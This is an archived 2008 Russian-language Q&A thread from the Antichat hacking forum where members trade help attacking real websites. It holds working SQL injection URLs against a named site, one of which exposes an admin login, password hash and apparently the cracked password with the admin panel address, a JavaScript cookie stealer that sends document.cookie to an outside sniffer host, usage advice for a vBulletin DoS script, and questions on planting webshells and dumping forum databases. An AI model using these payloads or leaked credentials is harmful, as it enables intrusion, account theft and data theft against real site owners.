Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   [Задай Вопрос - Получи Ответ] (https://forum.antichat.xyz/showthread.php?t=80624)

ZAMUT 12.08.2008 16:41

[Задай Вопрос - Получи Ответ]
 
Внимание! Данная тема предназначена для Ваших вопросов. Создавать темы, посвященные какому - либо вопросу - не нужно, все спрашиваем тут, в переделах тематики раздела. Созданные темы, содержащие вопрос будут удаляться, как оффтоп

ReanimatoR 13.08.2008 18:15

Выложили Dos скрипт для Vbulletin, но я никак не могу разобраться для какой он версии и какие параметры должны быть, чтобы он сработал. Поможете?(Там идет нагрузка на поиск, но это же вроде старьё, и Jelsoft давно это все фиксануло)
http://forum.antichat.ru/showpost.php?p=811052&postcount=48

Grey 13.08.2008 22:22

Цитата:

Сообщение от ReanimatoR
Выложили Dos скрипт для Vbulletin, но я никак не могу разобраться для какой он версии и какие параметры должны быть, чтобы он сработал. Поможете?(Там идет нагрузка на поиск, но это же вроде старьё, и Jelsoft давно это все фиксануло)
http://forum.antichat.ru/showpost.php?p=811052&postcount=48

1. Насчет версии, тут наверное гугл лучший помощник: вбиваешь кусок текста из сплоента (лучше тот, где идет формирование отправляемого пакета) в гугл и смотришь на заголовки тем в которых нашелся этот сплоент (к сожалению не могу с жопореза нормально просмотреть сайты), но заметил что даты постов с этим сплойтом идут за 2006-2007 год, т.е. он явно старенький и скорее всего не актуальный в новых версиях.

2. Какие параметры?, это видно из исходника сплоента:

Код:

if (@ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];

Два параметра - хост и директория с форумом, т.е. запускать так:
perl c:/1.pl www.test1.ru /forum/

Обрати внимание имя директории с форумом должно быть вместе с двумя слешами (в начале и конце имени), это видно по тому как формируется пакет:

Код:

$foo = "POST ".$dir."search.php HTTP/1.1\r\n".
А если форум находится в корне сайта, то вторым параметром должен быть просто слеш.

P.S. по поводу того что это старье - тут нечему удивлятся, тем кто копипастит всё это глубого побарабану новое оно или старое, а про описание я вообще промолчу.

MVadim 14.08.2008 08:48

гугл сказал что это для версии vBulletin <= 3.6.3

glower 14.08.2008 14:12

всем хай,научите новичка sql инъекции... плиз

satana8920 14.08.2008 14:31

по моему самый лучший мануал по Скулям http://forum.antichat.ru/showthread.php?t=43966
юзай поиск то

viv 14.08.2008 16:33

Привет всем :)
Подскажите как можно узнать префикс таблиц на атакуемом сайте?

вот ссылочка:http://www.hardvision.ru/index.php3 to=files&action=showCateg&cid=-233+union+select+1,2,3+from+har_user/*

там проходит sql инъекция , как ни пробовал по логики от названия сайта , не получается.
Может есть какие команды?

AnOcToJI 14.08.2008 16:57

Я не знаю где написать решили тут...
Короче есть в городе провайдер я к нему подключён, он представляет форум внутри сети , но войти может только с подключением внешки который имеет ип вида ***.**.**.**, а Ip сетевой предоставленной провайдером вид 10.*.*.***, так вот вопрос можно ли войти в форум не включай внехи а просто по локалке ?

Jokester 14.08.2008 17:10

Цитата:

Сообщение от viv
Привет всем :)
Подскажите как можно узнать префикс таблиц на атакуемом сайте?

вот ссылочка:http://www.hardvision.ru/index.php3 to=files&action=showCateg&cid=-233+union+select+1,2,3+from+har_user/*

там проходит sql инъекция , как ни пробовал по логики от названия сайта , не получается.
Может есть какие команды?

Там пятая ветка , вся информация в schema:

http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,table_name,3+from+information_s chema.tables+limit+17,1/*

viv 14.08.2008 17:20

Попробовал ввел Вашу строчку , но ни чего не отобразилось, нет префикса

Jokester 14.08.2008 17:25

Цитата:

Сообщение от viv
Попробовал ввел Вашу строчку , но ни чего не отобразилось, нет префикса

1 Читать статьи
2 Убрать пробелы из урла
3 Префикс к чему? В schema находится ВСЯ информация обо ВСЕХ таблицах и колонках

К посту ниже:
Выполни Все рекоммендации :)

viv 14.08.2008 17:31

Так со статьями понятно, читаем) но есть непонятки)
с schema понятно спасибо
а пробелов нет урл, ничего не отображается, я скопировал Вашу строчку , но ничего нет

~!DoK_tOR!~ 15.08.2008 04:08

Цитата:

Сообщение от viv
Так со статьями понятно, читаем) но есть непонятки)
с schema понятно спасибо
а пробелов нет урл, ничего не отображается, я скопировал Вашу строчку , но ничего нет

всё работает говорят же пробелы убери )

http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,nick,passwd),3+f rom+foto.admin_table+where+id=1/*

digit:30bf4fb4729f382ca2010fd445f1796d:mityap123

http://www.hardvision.ru/admin/

http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,nick,passw),3+fr om+foto.users+limit+0,1/*

sher_or_wer 16.08.2008 03:24

Доброго времени суток.
У меня такая проблема на одном форуме IPB 2.1.6 с помощью эксплоита я нашел хеши, но куки требует ещё и сесион_айди, в экплоите он не может всё время говорит что-то типа зайдите попозже сейчас not exist. Пожайлуста укажите где можно прочитать про расшифровку хэшей, более или менее поятно. Если же толку нет расшифровывать то значит придется через xss пробовать чтоли? Но там с регистрацией проблемы стоит жесткий контроль на каждого регистрирующегося.

~!DoK_tOR!~ 16.08.2008 03:35

Цитата:

Сообщение от sher_or_wer
Пожайлуста укажите где можно прочитать про расшифровку хэшей, более или менее поятно

https://forum.antichat.ru/thread76958.html

n0ne 16.08.2008 03:43

sher_or_wer, сессию можно достать только когда юзер, который тебе нужен в онлайне, если не ошибаюсь. А хэши можно расшифровать на milw0rm.com и hashcracking.info. Или можешь побрутить сам с помощью PasswordsPro.

sher_or_wer 16.08.2008 19:51

Спасибо за ответы ~!DoK_tOR!~ и n0ne

Nea7 17.08.2008 14:43

кто каким способом заливает в пхпбб вебшелл?
конкретно под phpBB 2.0.21 нужно

DimOnOID 17.08.2008 19:24

Цитата:

Сообщение от Nea7
кто каким способом заливает в пхпбб вебшелл?
конкретно под phpBB 2.0.21 нужно

читай
_http://forum.antichat.ru/thread24488.html

Nea7 17.08.2008 19:40

Цитата:

Сообщение от DimOnOID
читай
_http://forum.antichat.ru/thread24488.html

прочитал и даже попробовал, 2 6 7 спосб
http://forum.antichat.ru/showpost.php?p=198446&postcount=3 результата не далт

смысл тыкать на тему, которая ниже этой? нету других способов\не знаешь так и пиши :confused:

DimOnOID 17.08.2008 22:19

Цитата:

Сообщение от Nea7
прочитал и даже попробовал, 2 6 7 спосб
http://forum.antichat.ru/showpost.php?p=198446&postcount=3 результата не далт

смысл тыкать на тему, которая ниже этой? нету других способов\не знаешь так и пиши :confused:

Ты свой вопрос прочитай..и на мой ответ посмотри...

Nea7 18.08.2008 07:06

Цитата:

Сообщение от DimOnOID
Ты свой вопрос прочитай..и на мой ответ посмотри...

КТО каким способом З А ЛИ ВАЕТ в пхпбб вебшелл? (уже есть доступ к админ панели)
конкретно ПОД phpBB 2.0.21 нужно (так как способы для версий выше могут не подойти)

и причем тут твой пост?

ONERROROFFSYSTEM 18.08.2008 12:38

Буду краток. Сайт phenomen.ru не регистрирует пользователей на своём ресурсе, во избежание хакерских нападений. Возможно ли проникнуть без регистрации на его территорию.
P.S. Как?

kirufka 19.08.2008 20:09

народ нид хелп, какая версия ipb скажите плз: www.boards.warhead.ru

OMG!! 19.08.2008 20:20

Цитата:

Сообщение от kirufka
народ нид хелп, какая версия ipb скажите плз: www.boards.warhead.ru

http://boards.warhead.ru/ возможно 2.1.* :)

kirufka 20.08.2008 14:51

сенкс за ответ))
а народ, вот тема такая, в булке(vbulletin) версии 3.6.7 можно засунуть html в подпись(ну так во всяком случае на сайте одном), ятуда сую снифер - традиционно через ява скрипт, жду пол часа иду в лог снифера и что я вижу: все куки кроме id и пароля((( пишу знач вот так:
<script>img = new Image(); img.src = "http://na-s.ru/images/kirufka_1.gif?"+document.cookie;</script>
Адрес айта снифера: http://na-s.ru

Isis 20.08.2008 15:09

kirufka, значит смотрит гость

kirufka 20.08.2008 15:27

а если смотрю я сам?)))
Вот щас проверил - написал себе самому в личку сообщение предварительно удалив лог снифера... В снифере появился один "пост", в нем все про меня, но по прежнему нету пароля и айди(

Isis 20.08.2008 16:02

Цитата:

Сообщение от kirufka
народ нид хелп, какая версия ipb скажите плз: www.boards.warhead.ru

Invision Power Board v2.0

buds 22.08.2008 00:43

Всем Привет!
Интересует флудер для форума vBulletin 3.6.9
Нужно чтобы он в заданом разделе создавал темы с сообшениями, через определёное (указаное мной) время. Есть ли такие? :)

login999 24.08.2008 22:52

Привет всем, возник такой вопрос : получил доступ в админку форума на SMF 1.1.4, хочу снять базу. Если выбираю сжатие базы, то сервер скидает чехлы около минуты, а потом вылетает "Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator to inform of the time the error occurred and of anything you might have done that may have caused the error.
More information about this error may be available in the server error log."
(я считаю, что стоит ограничение на время выполнения пхп скрипта). Если выбираю опцию не сжимать базу, то дает скачать около 1 мб, а дальше процесс глохнет (причем независимо от того, сколько прошло времени (размер от 700 кб до 1.2 Мб)), такое ощущение что стоит ограничение и на размер выкачанной базы. Подскажите, что делать? Как это можно обойти .P.S. Сливаю шелл, но запустить его не могу, так как вылетает ошибка вида : File "/var/www/vhosts/xxx.xxx/httpdocs/forum/Themes/blackted/images/smile.php" is writeable by group

ReanimatoR 27.08.2008 21:22

Цитата:

Сообщение от buds
Всем Привет!
Интересует флудер для форума vBulletin 3.6.9
Нужно чтобы он в заданом разделе создавал темы с сообшениями, через определёное (указаное мной) время. Есть ли такие? :)

постучи мне в скайп rean1m5 - скину тебе флудер

gambitxxx 31.08.2008 12:58

Попытался выполнить эксплоит Invision Power Board <= 2.3.5 Multiple Vulnerabilities правленный Elekt на localhoste говорит что нет уязвимости(условия вроде бы искуственно созданы для уязвимости) по сцылке http://localhost/ipb/index.php?s=&act=xmlout&do=check-display-name&name=%2527 выдаёт notfound почемуто.

Zipper-rus 01.09.2008 13:44

Есть вопрос по поводу Powered by SMF 1.1.5 , кароче нашёл форум этой версии , но про баги в сети ни слова , правда читал на секьюрити лаб вот тут http://www.securitylab.ru/vulnerability/356091.php , написано уязвимость присутствует в версиях до 1.0.13 и 1.1.5 , но а какая именно не написано ((Зарегался я на форуме , в профиле оказывается мона аватар через урл вставлять пишу : http://old.antichat.ru/cgi-bin/s.jpg , захожу на лог сниффака вижу проснифалось , но только QUERY пустая (( Кароче мож кто знает какаю нить уязвимость в этой версии форума , подскажите !

masterBlack 02.09.2008 02:06

Подскажите какой форум самый безопасный?

login999 02.09.2008 02:11

Цитата:

Сообщение от masterBlack
Подскажите какой форум самый безопасный?

В принципе любой форум самой последней версии безопасный, главное его постоянно обновлять. Я порекомендовал бы SMF - простой в управлении и бесплатный

AND1 02.09.2008 02:16

vBulletin

buuubliiik 09.09.2008 05:19

Скачал phpbb 2.0.13 с sourceforge - пиздец! Сплоиты не работают, highight баг не работает! http://localhost/phpbb2.0.13/viewtopic.php?t=1&highlight=phpinfo(); - ЧЯДНТ? Где взять бажную старую версию?

buuubliiik 09.09.2008 05:22

Цитата:

Сообщение от [sql]
как в phpbb 3.0.2 залить шелл имея доступы к админки.

sql, я *** знает сколько назад впрашивал еще про RC версии, никто и не ответил. Права были admin (не forum creator).

777DEMYAN777 09.09.2008 15:37

Ребята подскажите как один форум переадресовать на другой!


Время: 18:32